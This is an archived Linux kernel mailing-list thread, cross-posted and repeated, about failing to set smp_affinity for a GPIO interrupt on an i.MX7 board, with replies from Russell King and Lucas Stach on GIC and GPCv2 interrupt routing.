All of lore.kernel.org
 help / color / mirror / Atom feed
* Not able to set smp_affinity for an IRQ on i.MX7
@ 2018-05-11 11:34 ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-11 11:34 UTC (permalink / raw)
  To: open list, linux-pm, linux-arm-kernel, kernelnewbies


[-- Attachment #1.1: Type: text/plain, Size: 1550 bytes --]

Hi,

I need one help.
I am using i.MX7 Sabre board with kernel version 4.1.15

Let's say I am interested in GPIO number: 21
I wanted to set CPU affinity for particular GPIO->IRQ number, so I tried
the below steps:
root@10:~# echo 21 > /sys/class/gpio/export
root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
root@10:~# cat /proc/interrupts | grep 21
  47: 0 0 gpio-mxc 21 Edge gpiolib
root@10:~# cat /sys/class/gpio/gpio21/direction
in
root@10:~# cat /proc/irq/47/smp_affinity
3
root@10:~# echo 2 > /proc/irq/47/smp_affinity
-bash: echo: write error: Input/output error

But I get input/output error.
When I debug further, found that irq_can_set_affinity is returning 0:
[    0.000000] genirq: irq_can_set_affinity (0): balance: 1, irq_data.chip:
a81b7e48, irq_set_affinity:   (null)
[    0.000000] write_irq_affinity: FAIL

I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
This change is working, but the smp_affinity setting for the new IRQ is not
working.

When I try to set smp_affinity for mmc0, then it works.
# cat /proc/interrupts | grep mmc
295:         55          0     GPCV2  22 Edge      mmc0
296:          0          0     GPCV2  23 Edge      mmc1
297:         52          0     GPCV2  24 Edge      mmc2

root@10:~# echo 2 > /proc/irq/295/smp_affinity
root@10:~#


So, I wanted to know what are the conditions for which setting smp_affinity
for an IRQ will work ?

Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
Whether, irq_set_affinity_hint() will work in this case ?


Thanks,
Pintu

[-- Attachment #1.2: Type: text/html, Size: 4264 bytes --]

[-- Attachment #2: Type: text/plain, Size: 170 bytes --]

_______________________________________________
Kernelnewbies mailing list
Kernelnewbies@kernelnewbies.org
https://lists.kernelnewbies.org/mailman/listinfo/kernelnewbies

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Not able to set smp_affinity for an IRQ on i.MX7
@ 2018-05-11 11:34 ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-11 11:34 UTC (permalink / raw)
  To: kernelnewbies

Hi,

I need one help.
I am using i.MX7 Sabre board with kernel version 4.1.15

Let's say I am interested in GPIO number: 21
I wanted to set CPU affinity for particular GPIO->IRQ number, so I tried
the below steps:
root at 10:~# echo 21 > /sys/class/gpio/export
root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
root at 10:~# cat /proc/interrupts | grep 21
  47: 0 0 gpio-mxc 21 Edge gpiolib
root at 10:~# cat /sys/class/gpio/gpio21/direction
in
root at 10:~# cat /proc/irq/47/smp_affinity
3
root at 10:~# echo 2 > /proc/irq/47/smp_affinity
-bash: echo: write error: Input/output error

But I get input/output error.
When I debug further, found that irq_can_set_affinity is returning 0:
[    0.000000] genirq: irq_can_set_affinity (0): balance: 1, irq_data.chip:
a81b7e48, irq_set_affinity:   (null)
[    0.000000] write_irq_affinity: FAIL

I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
This change is working, but the smp_affinity setting for the new IRQ is not
working.

When I try to set smp_affinity for mmc0, then it works.
# cat /proc/interrupts | grep mmc
295:         55          0     GPCV2  22 Edge      mmc0
296:          0          0     GPCV2  23 Edge      mmc1
297:         52          0     GPCV2  24 Edge      mmc2

root at 10:~# echo 2 > /proc/irq/295/smp_affinity
root at 10:~#


So, I wanted to know what are the conditions for which setting smp_affinity
for an IRQ will work ?

Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
Whether, irq_set_affinity_hint() will work in this case ?


Thanks,
Pintu
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.kernelnewbies.org/pipermail/kernelnewbies/attachments/20180511/a55f3961/attachment.html>

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <5af57fea.1c69fb81.885f0.2377.GMRIR@mx.google.com>
  2018-05-11 11:37     ` Pintu Kumar
@ 2018-05-11 11:37     ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-11 11:37 UTC (permalink / raw)
  To: open list, linux-arm-kernel, Russell King - ARM Linux, kernelnewbies

Hi,

I need one help.
I am using i.MX7 Sabre board with kernel version 4.1.15

Let's say I am interested in GPIO number: 21
I wanted to set CPU affinity for particular GPIO->IRQ number, so I
tried the below steps:
root@10:~# echo 21 > /sys/class/gpio/export
root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
root@10:~# cat /proc/interrupts | grep 21
  47: 0 0 gpio-mxc 21 Edge gpiolib
root@10:~# cat /sys/class/gpio/gpio21/direction
in
root@10:~# cat /proc/irq/47/smp_affinity
3
root@10:~# echo 2 > /proc/irq/47/smp_affinity
-bash: echo: write error: Input/output error

But I get input/output error.
When I debug further, found that irq_can_set_affinity is returning 0:
[    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
irq_data.chip: a81b7e48, irq_set_affinity:   (null)
[    0.000000] write_irq_affinity: FAIL

I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
This change is working, but the smp_affinity setting for the new IRQ
is not working.

When I try to set smp_affinity for mmc0, then it works.
# cat /proc/interrupts | grep mmc
295:         55          0     GPCV2  22 Edge      mmc0
296:          0          0     GPCV2  23 Edge      mmc1
297:         52          0     GPCV2  24 Edge      mmc2

root@10:~# echo 2 > /proc/irq/295/smp_affinity
root@10:~#


So, I wanted to know what are the conditions for which setting
smp_affinity for an IRQ will work ?

Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
Whether, irq_set_affinity_hint() will work in this case ?


Thanks,
Pintu

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-11 11:37     ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-11 11:37 UTC (permalink / raw)
  To: linux-arm-kernel

Hi,

I need one help.
I am using i.MX7 Sabre board with kernel version 4.1.15

Let's say I am interested in GPIO number: 21
I wanted to set CPU affinity for particular GPIO->IRQ number, so I
tried the below steps:
root at 10:~# echo 21 > /sys/class/gpio/export
root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
root at 10:~# cat /proc/interrupts | grep 21
  47: 0 0 gpio-mxc 21 Edge gpiolib
root at 10:~# cat /sys/class/gpio/gpio21/direction
in
root at 10:~# cat /proc/irq/47/smp_affinity
3
root at 10:~# echo 2 > /proc/irq/47/smp_affinity
-bash: echo: write error: Input/output error

But I get input/output error.
When I debug further, found that irq_can_set_affinity is returning 0:
[    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
irq_data.chip: a81b7e48, irq_set_affinity:   (null)
[    0.000000] write_irq_affinity: FAIL

I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
This change is working, but the smp_affinity setting for the new IRQ
is not working.

When I try to set smp_affinity for mmc0, then it works.
# cat /proc/interrupts | grep mmc
295:         55          0     GPCV2  22 Edge      mmc0
296:          0          0     GPCV2  23 Edge      mmc1
297:         52          0     GPCV2  24 Edge      mmc2

root at 10:~# echo 2 > /proc/irq/295/smp_affinity
root at 10:~#


So, I wanted to know what are the conditions for which setting
smp_affinity for an IRQ will work ?

Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
Whether, irq_set_affinity_hint() will work in this case ?


Thanks,
Pintu

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-11 11:37     ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-11 11:37 UTC (permalink / raw)
  To: kernelnewbies

Hi,

I need one help.
I am using i.MX7 Sabre board with kernel version 4.1.15

Let's say I am interested in GPIO number: 21
I wanted to set CPU affinity for particular GPIO->IRQ number, so I
tried the below steps:
root at 10:~# echo 21 > /sys/class/gpio/export
root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
root at 10:~# cat /proc/interrupts | grep 21
  47: 0 0 gpio-mxc 21 Edge gpiolib
root at 10:~# cat /sys/class/gpio/gpio21/direction
in
root at 10:~# cat /proc/irq/47/smp_affinity
3
root at 10:~# echo 2 > /proc/irq/47/smp_affinity
-bash: echo: write error: Input/output error

But I get input/output error.
When I debug further, found that irq_can_set_affinity is returning 0:
[    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
irq_data.chip: a81b7e48, irq_set_affinity:   (null)
[    0.000000] write_irq_affinity: FAIL

I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
This change is working, but the smp_affinity setting for the new IRQ
is not working.

When I try to set smp_affinity for mmc0, then it works.
# cat /proc/interrupts | grep mmc
295:         55          0     GPCV2  22 Edge      mmc0
296:          0          0     GPCV2  23 Edge      mmc1
297:         52          0     GPCV2  24 Edge      mmc2

root at 10:~# echo 2 > /proc/irq/295/smp_affinity
root at 10:~#


So, I wanted to know what are the conditions for which setting
smp_affinity for an IRQ will work ?

Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
Whether, irq_set_affinity_hint() will work in this case ?


Thanks,
Pintu

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2018-05-11 11:37     ` Pintu Kumar
@ 2018-05-11 12:39       ` Russell King - ARM Linux
  -1 siblings, 0 replies; 183+ messages in thread
From: Russell King - ARM Linux @ 2018-05-11 12:39 UTC (permalink / raw)
  To: Pintu Kumar; +Cc: open list, linux-arm-kernel, kernelnewbies

On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> Hi,
> 
> I need one help.
> I am using i.MX7 Sabre board with kernel version 4.1.15
> 
> Let's say I am interested in GPIO number: 21
> I wanted to set CPU affinity for particular GPIO->IRQ number, so I
> tried the below steps:
> root@10:~# echo 21 > /sys/class/gpio/export
> root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> root@10:~# cat /proc/interrupts | grep 21
>   47: 0 0 gpio-mxc 21 Edge gpiolib
> root@10:~# cat /sys/class/gpio/gpio21/direction
> in
> root@10:~# cat /proc/irq/47/smp_affinity
> 3
> root@10:~# echo 2 > /proc/irq/47/smp_affinity
> -bash: echo: write error: Input/output error
> 
> But I get input/output error.
> When I debug further, found that irq_can_set_affinity is returning 0:
> [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> [    0.000000] write_irq_affinity: FAIL
> 
> I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
> This change is working, but the smp_affinity setting for the new IRQ
> is not working.
> 
> When I try to set smp_affinity for mmc0, then it works.
> # cat /proc/interrupts | grep mmc
> 295:         55          0     GPCV2  22 Edge      mmc0
> 296:          0          0     GPCV2  23 Edge      mmc1
> 297:         52          0     GPCV2  24 Edge      mmc2
> 
> root@10:~# echo 2 > /proc/irq/295/smp_affinity
> root@10:~#
> 
> 
> So, I wanted to know what are the conditions for which setting
> smp_affinity for an IRQ will work ?
> 
> Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
> Whether, irq_set_affinity_hint() will work in this case ?

IRQ affinity is only supported where interrupts are _directly_ wired to
the GIC.  It's the GIC which does the interrupt steering to the CPU
cores.

Interrupts on downstream interrupt controllers (such as GPCV2) have no
ability to be directed independently to other CPUs - the only possible
way to change the mapping is to move _all_ interrupts on that controller,
and any downstream chained interrupts at GIC level.

Hence why Interrupt 295 has no irq_set_affinity function: there is no way
for the interrupt controller itself to change the affinity of the input
interrupt.

-- 
RMK's Patch system: http://www.armlinux.org.uk/developer/patches/
FTTC broadband for 0.8mile line in suburbia: sync at 8.8Mbps down 630kbps up
According to speedtest.net: 8.21Mbps down 510kbps up

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-11 12:39       ` Russell King - ARM Linux
  0 siblings, 0 replies; 183+ messages in thread
From: Russell King - ARM Linux @ 2018-05-11 12:39 UTC (permalink / raw)
  To: linux-arm-kernel

On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> Hi,
> 
> I need one help.
> I am using i.MX7 Sabre board with kernel version 4.1.15
> 
> Let's say I am interested in GPIO number: 21
> I wanted to set CPU affinity for particular GPIO->IRQ number, so I
> tried the below steps:
> root at 10:~# echo 21 > /sys/class/gpio/export
> root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> root at 10:~# cat /proc/interrupts | grep 21
>   47: 0 0 gpio-mxc 21 Edge gpiolib
> root at 10:~# cat /sys/class/gpio/gpio21/direction
> in
> root at 10:~# cat /proc/irq/47/smp_affinity
> 3
> root at 10:~# echo 2 > /proc/irq/47/smp_affinity
> -bash: echo: write error: Input/output error
> 
> But I get input/output error.
> When I debug further, found that irq_can_set_affinity is returning 0:
> [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> [    0.000000] write_irq_affinity: FAIL
> 
> I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
> This change is working, but the smp_affinity setting for the new IRQ
> is not working.
> 
> When I try to set smp_affinity for mmc0, then it works.
> # cat /proc/interrupts | grep mmc
> 295:         55          0     GPCV2  22 Edge      mmc0
> 296:          0          0     GPCV2  23 Edge      mmc1
> 297:         52          0     GPCV2  24 Edge      mmc2
> 
> root at 10:~# echo 2 > /proc/irq/295/smp_affinity
> root at 10:~#
> 
> 
> So, I wanted to know what are the conditions for which setting
> smp_affinity for an IRQ will work ?
> 
> Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
> Whether, irq_set_affinity_hint() will work in this case ?

IRQ affinity is only supported where interrupts are _directly_ wired to
the GIC.  It's the GIC which does the interrupt steering to the CPU
cores.

Interrupts on downstream interrupt controllers (such as GPCV2) have no
ability to be directed independently to other CPUs - the only possible
way to change the mapping is to move _all_ interrupts on that controller,
and any downstream chained interrupts at GIC level.

Hence why Interrupt 295 has no irq_set_affinity function: there is no way
for the interrupt controller itself to change the affinity of the input
interrupt.

-- 
RMK's Patch system: http://www.armlinux.org.uk/developer/patches/
FTTC broadband for 0.8mile line in suburbia: sync at 8.8Mbps down 630kbps up
According to speedtest.net: 8.21Mbps down 510kbps up

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2018-05-11 12:39       ` Russell King - ARM Linux
  (?)
@ 2018-05-11 13:04         ` Lucas Stach
  -1 siblings, 0 replies; 183+ messages in thread
From: Lucas Stach @ 2018-05-11 13:04 UTC (permalink / raw)
  To: Russell King - ARM Linux, Pintu Kumar
  Cc: open list, linux-arm-kernel, kernelnewbies

Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> > Hi,
> > 
> > I need one help.
> > I am using i.MX7 Sabre board with kernel version 4.1.15
> > 
> > Let's say I am interested in GPIO number: 21
> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
> > tried the below steps:
> > root@10:~# echo 21 > /sys/class/gpio/export
> > root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> > root@10:~# cat /proc/interrupts | grep 21
> >   47: 0 0 gpio-mxc 21 Edge gpiolib
> > root@10:~# cat /sys/class/gpio/gpio21/direction
> > in
> > root@10:~# cat /proc/irq/47/smp_affinity
> > 3
> > root@10:~# echo 2 > /proc/irq/47/smp_affinity
> > -bash: echo: write error: Input/output error
> > 
> > But I get input/output error.
> > When I debug further, found that irq_can_set_affinity is returning 0:
> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> > [    0.000000] write_irq_affinity: FAIL
> > 
> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
> > This change is working, but the smp_affinity setting for the new IRQ
> > is not working.
> > 
> > When I try to set smp_affinity for mmc0, then it works.
> > # cat /proc/interrupts | grep mmc
> > 295:         55          0     GPCV2  22 Edge      mmc0
> > 296:          0          0     GPCV2  23 Edge      mmc1
> > 297:         52          0     GPCV2  24 Edge      mmc2
> > 
> > root@10:~# echo 2 > /proc/irq/295/smp_affinity
> > root@10:~#
> > 
> > 
> > So, I wanted to know what are the conditions for which setting
> > smp_affinity for an IRQ will work ?
> > 
> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
> > Whether, irq_set_affinity_hint() will work in this case ?
> 
> IRQ affinity is only supported where interrupts are _directly_ wired to
> the GIC.  It's the GIC which does the interrupt steering to the CPU
> cores.
> 
> Interrupts on downstream interrupt controllers (such as GPCV2) have no
> ability to be directed independently to other CPUs - the only possible
> way to change the mapping is to move _all_ interrupts on that controller,
> and any downstream chained interrupts at GIC level.
> 
> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
> for the interrupt controller itself to change the affinity of the input
> interrupt.

The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
handled by forwarding the request to the GIC by
irq_chip_set_affinity_parent().

As this is handled correctly in the upstream kernel since the first
commit introducing support for the GPCv2, it seems the issue is only
present in some downstream kernel.

Regards,
Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-11 13:04         ` Lucas Stach
  0 siblings, 0 replies; 183+ messages in thread
From: Lucas Stach @ 2018-05-11 13:04 UTC (permalink / raw)
  To: linux-arm-kernel

Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> > Hi,
> > 
> > I need one help.
> > I am using i.MX7 Sabre board with kernel version 4.1.15
> > 
> > Let's say I am interested in GPIO number: 21
> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
> > tried the below steps:
> > root at 10:~# echo 21 > /sys/class/gpio/export
> > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> > root at 10:~# cat /proc/interrupts | grep 21
> >   47: 0 0 gpio-mxc 21 Edge gpiolib
> > root at 10:~# cat /sys/class/gpio/gpio21/direction
> > in
> > root at 10:~# cat /proc/irq/47/smp_affinity
> > 3
> > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
> > -bash: echo: write error: Input/output error
> > 
> > But I get input/output error.
> > When I debug further, found that irq_can_set_affinity is returning 0:
> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> > [    0.000000] write_irq_affinity: FAIL
> > 
> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
> > This change is working, but the smp_affinity setting for the new IRQ
> > is not working.
> > 
> > When I try to set smp_affinity for mmc0, then it works.
> > # cat /proc/interrupts | grep mmc
> > 295:         55          0     GPCV2  22 Edge      mmc0
> > 296:          0          0     GPCV2  23 Edge      mmc1
> > 297:         52          0     GPCV2  24 Edge      mmc2
> > 
> > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
> > root at 10:~#
> > 
> > 
> > So, I wanted to know what are the conditions for which setting
> > smp_affinity for an IRQ will work ?
> > 
> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
> > Whether, irq_set_affinity_hint() will work in this case ?
> 
> IRQ affinity is only supported where interrupts are _directly_ wired to
> the GIC.  It's the GIC which does the interrupt steering to the CPU
> cores.
> 
> Interrupts on downstream interrupt controllers (such as GPCV2) have no
> ability to be directed independently to other CPUs - the only possible
> way to change the mapping is to move _all_ interrupts on that controller,
> and any downstream chained interrupts at GIC level.
> 
> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
> for the interrupt controller itself to change the affinity of the input
> interrupt.

The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
handled by forwarding the request to the GIC by
irq_chip_set_affinity_parent().

As this is handled correctly in the upstream kernel since the first
commit introducing support for the GPCv2, it seems the issue is only
present in some downstream kernel.

Regards,
Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-11 13:04         ` Lucas Stach
  0 siblings, 0 replies; 183+ messages in thread
From: Lucas Stach @ 2018-05-11 13:04 UTC (permalink / raw)
  To: kernelnewbies

Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
> > Hi,
> > 
> > I need one help.
> > I am using i.MX7 Sabre board with kernel version 4.1.15
> > 
> > Let's say I am interested in GPIO number: 21
> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
> > tried the below steps:
> > root at 10:~# echo 21 > /sys/class/gpio/export
> > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
> > root at 10:~# cat /proc/interrupts | grep 21
> >   47: 0 0 gpio-mxc 21 Edge gpiolib
> > root at 10:~# cat /sys/class/gpio/gpio21/direction
> > in
> > root at 10:~# cat /proc/irq/47/smp_affinity
> > 3
> > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
> > -bash: echo: write error: Input/output error
> > 
> > But I get input/output error.
> > When I debug further, found that irq_can_set_affinity is returning 0:
> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
> > [    0.000000] write_irq_affinity: FAIL
> > 
> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
> > This change is working, but the smp_affinity setting for the new IRQ
> > is not working.
> > 
> > When I try to set smp_affinity for mmc0, then it works.
> > # cat /proc/interrupts | grep mmc
> > 295:         55          0     GPCV2  22 Edge      mmc0
> > 296:          0          0     GPCV2  23 Edge      mmc1
> > 297:         52          0     GPCV2  24 Edge      mmc2
> > 
> > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
> > root at 10:~#
> > 
> > 
> > So, I wanted to know what are the conditions for which setting
> > smp_affinity for an IRQ will work ?
> > 
> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
> > Whether, irq_set_affinity_hint() will work in this case ?
> 
> IRQ affinity is only supported where interrupts are _directly_ wired to
> the GIC.  It's the GIC which does the interrupt steering to the CPU
> cores.
> 
> Interrupts on downstream interrupt controllers (such as GPCV2) have no
> ability to be directed independently to other CPUs - the only possible
> way to change the mapping is to move _all_ interrupts on that controller,
> and any downstream chained interrupts at GIC level.
> 
> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
> for the interrupt controller itself to change the affinity of the input
> interrupt.

The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
handled by forwarding the request to the GIC by
irq_chip_set_affinity_parent().

As this is handled correctly in the upstream kernel since the first
commit introducing support for the GPCv2, it seems the issue is only
present in some downstream kernel.

Regards,
Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2018-05-11 13:04         ` Lucas Stach
  (?)
@ 2018-05-11 14:37           ` Pintu Kumar
  -1 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-11 14:37 UTC (permalink / raw)
  To: Lucas Stach
  Cc: Russell King - ARM Linux, open list, linux-arm-kernel, kernelnewbies

On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
>> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> > Hi,
>> >
>> > I need one help.
>> > I am using i.MX7 Sabre board with kernel version 4.1.15
>> >
>> > Let's say I am interested in GPIO number: 21
>> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
>> > tried the below steps:
>> > root@10:~# echo 21 > /sys/class/gpio/export
>> > root@10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> > root@10:~# cat /proc/interrupts | grep 21
>> >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> > root@10:~# cat /sys/class/gpio/gpio21/direction
>> > in
>> > root@10:~# cat /proc/irq/47/smp_affinity
>> > 3
>> > root@10:~# echo 2 > /proc/irq/47/smp_affinity
>> > -bash: echo: write error: Input/output error
>> >
>> > But I get input/output error.
>> > When I debug further, found that irq_can_set_affinity is returning 0:
>> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> > [    0.000000] write_irq_affinity: FAIL
>> >
>> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
>> > This change is working, but the smp_affinity setting for the new IRQ
>> > is not working.
>> >
>> > When I try to set smp_affinity for mmc0, then it works.
>> > # cat /proc/interrupts | grep mmc
>> > 295:         55          0     GPCV2  22 Edge      mmc0
>> > 296:          0          0     GPCV2  23 Edge      mmc1
>> > 297:         52          0     GPCV2  24 Edge      mmc2
>> >
>> > root@10:~# echo 2 > /proc/irq/295/smp_affinity
>> > root@10:~#
>> >
>> >
>> > So, I wanted to know what are the conditions for which setting
>> > smp_affinity for an IRQ will work ?
>> >
>> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
>> > Whether, irq_set_affinity_hint() will work in this case ?
>>
>> IRQ affinity is only supported where interrupts are _directly_ wired to
>> the GIC.  It's the GIC which does the interrupt steering to the CPU
>> cores.
>>
>> Interrupts on downstream interrupt controllers (such as GPCV2) have no
>> ability to be directed independently to other CPUs - the only possible
>> way to change the mapping is to move _all_ interrupts on that controller,
>> and any downstream chained interrupts at GIC level.
>>
>> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
>> for the interrupt controller itself to change the affinity of the input
>> interrupt.
>
> The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
> of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
> handled by forwarding the request to the GIC by
> irq_chip_set_affinity_parent().
>
> As this is handled correctly in the upstream kernel since the first
> commit introducing support for the GPCv2, it seems the issue is only
> present in some downstream kernel.
>

OK. Thanks so much for your reply.

I saw some of the drivers using irq_set_affinity_hint() to force the
IRQ affinity to a particular CPU.
This is the sample:
{
cpumask_clear(mask);
cpumask_set_cpu(cpu, mask);
irq_set_affinity_hint(irq, mask);
}

Whether this logic will work for a particular GPIO pin ?


> Regards,
> Lucas

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2018-05-11 14:37           ` Pintu Kumar
  0 siblings, 0 replies; 183+ messages in thread
From: Pintu Kumar @ 2018-05-11 14:37 UTC (permalink / raw)
  To: linux-arm-kernel

On Fri, May 11, 2018 at 6:34 PM, Lucas Stach <l.stach@pengutronix.de> wrote:
> Am Freitag, den 11.05.2018, 13:39 +0100 schrieb Russell King - ARM Linux:
>> On Fri, May 11, 2018 at 05:07:37PM +0530, Pintu Kumar wrote:
>> > Hi,
>> >
>> > I need one help.
>> > I am using i.MX7 Sabre board with kernel version 4.1.15
>> >
>> > Let's say I am interested in GPIO number: 21
>> > I wanted to set CPU affinity for particular GPIO->IRQ number, so I
>> > tried the below steps:
>> > root at 10:~# echo 21 > /sys/class/gpio/export
>> > root at 10:~# echo "rising" > /sys/class/gpio/gpio21/edge
>> > root at 10:~# cat /proc/interrupts | grep 21
>> >   47: 0 0 gpio-mxc 21 Edge gpiolib
>> > root at 10:~# cat /sys/class/gpio/gpio21/direction
>> > in
>> > root at 10:~# cat /proc/irq/47/smp_affinity
>> > 3
>> > root at 10:~# echo 2 > /proc/irq/47/smp_affinity
>> > -bash: echo: write error: Input/output error
>> >
>> > But I get input/output error.
>> > When I debug further, found that irq_can_set_affinity is returning 0:
>> > [    0.000000] genirq: irq_can_set_affinity (0): balance: 1,
>> > irq_data.chip: a81b7e48, irq_set_affinity:   (null)
>> > [    0.000000] write_irq_affinity: FAIL
>> >
>> > I also tried first setting /proc/irq/default_smp_affinity to 2 (from 3).
>> > This change is working, but the smp_affinity setting for the new IRQ
>> > is not working.
>> >
>> > When I try to set smp_affinity for mmc0, then it works.
>> > # cat /proc/interrupts | grep mmc
>> > 295:         55          0     GPCV2  22 Edge      mmc0
>> > 296:          0          0     GPCV2  23 Edge      mmc1
>> > 297:         52          0     GPCV2  24 Edge      mmc2
>> >
>> > root at 10:~# echo 2 > /proc/irq/295/smp_affinity
>> > root at 10:~#
>> >
>> >
>> > So, I wanted to know what are the conditions for which setting
>> > smp_affinity for an IRQ will work ?
>> >
>> > Is there any way by which I can set CPU affinity to a GPIO -> IRQ ?
>> > Whether, irq_set_affinity_hint() will work in this case ?
>>
>> IRQ affinity is only supported where interrupts are _directly_ wired to
>> the GIC.  It's the GIC which does the interrupt steering to the CPU
>> cores.
>>
>> Interrupts on downstream interrupt controllers (such as GPCV2) have no
>> ability to be directed independently to other CPUs - the only possible
>> way to change the mapping is to move _all_ interrupts on that controller,
>> and any downstream chained interrupts at GIC level.
>>
>> Hence why Interrupt 295 has no irq_set_affinity function: there is no way
>> for the interrupt controller itself to change the affinity of the input
>> interrupt.
>
> The GPCv2 though is a secondary IRQ controller which has a 1:1 mapping
> of its input IRQs to the upstream GIC IRQ lines. Affinity can thus be
> handled by forwarding the request to the GIC by
> irq_chip_set_affinity_parent().
>
> As this is handled correctly in the upstream kernel since the first
> commit introducing support for the GPCv2, it seems the issue is only
> present in some downstream kernel.
>

OK. Thanks so much for your reply.

I saw some of the drivers using irq_set_affinity_hint() to force the
IRQ affinity to a particular CPU.
This is the sample:
{
cpumask_clear(mask);
cpumask_set_cpu(cpu, mask);
irq_set_affinity_hint(irq, mask);
}

Whether this logic will work for a particular GPIO pin ?


> Regards,
